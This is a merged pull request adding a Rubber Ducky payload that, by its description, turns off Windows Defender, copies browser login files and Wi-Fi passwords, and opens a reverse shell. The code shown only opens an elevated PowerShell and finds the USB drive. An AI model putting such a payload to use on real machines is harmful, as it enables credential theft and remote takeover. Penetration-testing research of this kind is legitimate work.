### PR TITLE
DUCKY-Harvest

### PR DESCRIPTION
**Pull request by nic005-arch**
# USB Data Harvester

**DUCKY-Harvest** is a PowerShell script designed to collect sensitive data from a Windows system. When executed from a USB drive labeled **"DUCKY"**, it performs the following tasks:

1. **Disables Windows Defender Real-Time Monitoring:** Temporarily turns off real-time protection to avoid detection during data collection.
2. **Copies Browser Data:** Retrieves and stores browser files containing login information from Chrome, Brave, Firefox, and Edge.
3. **Gathers System Information:** Collects detailed information about the computer's hardware, processes, services, and network configuration.
4. **Retrieves Wi-Fi Passwords:** Extracts saved Wi-Fi passwords from the system.
5. **Establishes a Reverse Shell:** Opens a remote connection to a specified IP and port for further control.
6. **Re-enables Windows Defender:** Restores real-time protection after data collection is complete.

> **Note:** This script is designed for use in security research and ethical hacking contexts. Unauthorized use of this script may be illegal and unethical.

### CODE REVIEW

File: payloads/library/credentials/Duckie-Harvest/payload.txt [hunk 1]
```diff
@@ -0,0 +1,72 @@
...
+    DELAY 200
+    STRING powershell 
+    CTRL-SHIFT ENTER
+    DELAY 400
+    LEFT
+    DELAY 150
+    ENTER
+    DELAY 500
+
+    STRINGLN $duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
```
[the remark this answers is not in the document]
Comment (nic005-arch) [reply payloads/library/credentials/Duckie-Harvest/payload.txt:62]: ok , i will implement it right now

**Comment by nic005-arch** [comment]
i updated it as you suggested

**Comment by hak5peaks** [comment]
Awesome. Thank you! I will go ahead and merge!

**Comment by nic005-arch** [comment]
Thank you for your suggestions

**Pull request merged**